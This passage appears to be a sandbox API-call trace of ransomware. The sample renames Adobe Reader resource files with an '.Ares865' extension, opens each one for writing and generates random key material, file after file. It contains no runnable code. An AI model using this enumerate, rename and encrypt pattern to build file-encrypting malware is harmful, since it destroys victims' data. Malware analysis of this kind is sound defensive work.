10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.hyp.ares865"), dwFlags=0x1) returned 1 [0158.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0158.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.230] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.231] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nyn16.clx" | out: lpString1="nyn16.clx") returned="nyn16.clx" [0158.231] lstrlenW (lpString="nyn16.clx") returned 9 [0158.231] lstrlenW (lpString="Ares865") returned 7 [0158.232] lstrcmpiW (lpString1="n16.clx", lpString2="Ares865") returned 1 [0158.232] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn16.clx.Ares865") returned 105 [0158.232] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn16.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn16.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn16.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn16.clx.ares865"), dwFlags=0x1) returned 1 [0158.234] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn16.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn16.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.234] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15356) returned 1 [0158.235] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.240] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.241] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.241] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.241] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nyn47.hsp" | out: lpString1="nyn47.hsp") returned="nyn47.hsp" [0158.241] lstrlenW (lpString="nyn47.hsp") returned 9 [0158.241] lstrlenW (lpString="Ares865") returned 7 [0158.241] lstrcmpiW (lpString1="n47.hsp", lpString2="Ares865") returned 1 [0158.242] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn47.hsp.Ares865") returned 105 [0158.242] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn47.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn47.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn47.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn47.hsp.ares865"), dwFlags=0x1) returned 1 [0158.244] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn47.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn47.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.244] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=241949) returned 1 [0158.245] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.245] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.245] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.261] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.262] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.262] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.266] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="pol.fca" | out: lpString1="pol.fca") returned="pol.fca" [0158.266] lstrlenW (lpString="pol.fca") returned 7 [0158.266] lstrlenW (lpString="Ares865") returned 7 [0158.267] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.fca.Ares865") returned 103 [0158.267] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.fca.ares865"), dwFlags=0x1) returned 1 [0158.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=972) returned 1 [0158.270] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.271] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.271] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.273] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.274] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.274] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.275] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="pol.hyp" | out: lpString1="pol.hyp") returned="pol.hyp" [0158.275] lstrlenW (lpString="pol.hyp") returned 7 [0158.275] lstrlenW (lpString="Ares865") returned 7 [0158.275] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.hyp.Ares865") returned 103 [0158.275] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.hyp.ares865"), dwFlags=0x1) returned 1 [0158.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.278] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=118784) returned 1 [0158.279] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.279] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.279] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.287] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.290] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="pol103.hsp" | out: lpString1="pol103.hsp") returned="pol103.hsp" [0158.290] lstrlenW (lpString="pol103.hsp") returned 10 [0158.290] lstrlenW (lpString="Ares865") returned 7 [0158.290] lstrcmpiW (lpString1="103.hsp", lpString2="Ares865") returned -1 [0158.291] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol103.hsp.Ares865") returned 106 [0158.291] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol103.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol103.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol103.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol103.hsp.ares865"), dwFlags=0x1) returned 1 [0158.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol103.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol103.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=720111) returned 1 [0158.295] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.296] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.296] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.338] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.339] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.339] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.348] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="pol32.clx" | out: lpString1="pol32.clx") returned="pol32.clx" [0158.349] lstrlenW (lpString="pol32.clx") returned 9 [0158.349] lstrlenW (lpString="Ares865") returned 7 [0158.349] lstrcmpiW (lpString1="l32.clx", lpString2="Ares865") returned 1 [0158.349] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol32.clx.Ares865") returned 105 [0158.349] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol32.clx.ares865"), dwFlags=0x1) returned 1 [0158.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0158.368] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.374] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.374] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.374] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.375] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="prt.fca" | out: lpString1="prt.fca") returned="prt.fca" [0158.375] lstrlenW (lpString="prt.fca") returned 7 [0158.375] lstrlenW (lpString="Ares865") returned 7 [0158.376] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.fca.Ares865") returned 103 [0158.376] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.fca.ares865"), dwFlags=0x1) returned 1 [0158.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.379] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1188) returned 1 [0158.379] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.380] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.380] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.383] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.383] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.383] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.384] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="prt.hyp" | out: lpString1="prt.hyp") returned="prt.hyp" [0158.384] lstrlenW (lpString="prt.hyp") returned 7 [0158.384] lstrlenW (lpString="Ares865") returned 7 [0158.384] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.hyp.Ares865") returned 103 [0158.384] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.hyp.ares865"), dwFlags=0x1) returned 1 [0158.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.387] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0158.387] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.388] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.388] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.391] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.392] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="prt32.clx" | out: lpString1="prt32.clx") returned="prt32.clx" [0158.392] lstrlenW (lpString="prt32.clx") returned 9 [0158.392] lstrlenW (lpString="Ares865") returned 7 [0158.392] lstrcmpiW (lpString1="t32.clx", lpString2="Ares865") returned 1 [0158.393] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt32.clx.Ares865") returned 105 [0158.393] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt32.clx.ares865"), dwFlags=0x1) returned 1 [0158.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.395] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32748) returned 1 [0158.396] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.397] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.397] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.401] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.401] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.401] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.402] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="prt39.hsp" | out: lpString1="prt39.hsp") returned="prt39.hsp" [0158.402] lstrlenW (lpString="prt39.hsp") returned 9 [0158.402] lstrlenW (lpString="Ares865") returned 7 [0158.402] lstrcmpiW (lpString1="t39.hsp", lpString2="Ares865") returned 1 [0158.403] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt39.hsp.Ares865") returned 105 [0158.403] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt39.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt39.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt39.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt39.hsp.ares865"), dwFlags=0x1) returned 1 [0158.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt39.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt39.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.405] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=95852) returned 1 [0158.405] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.413] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.415] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rum.hyp" | out: lpString1="rum.hyp") returned="rum.hyp" [0158.415] lstrlenW (lpString="rum.hyp") returned 7 [0158.415] lstrlenW (lpString="Ares865") returned 7 [0158.416] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum.hyp.Ares865") returned 103 [0158.416] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum.hyp.ares865"), dwFlags=0x1) returned 1 [0158.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, 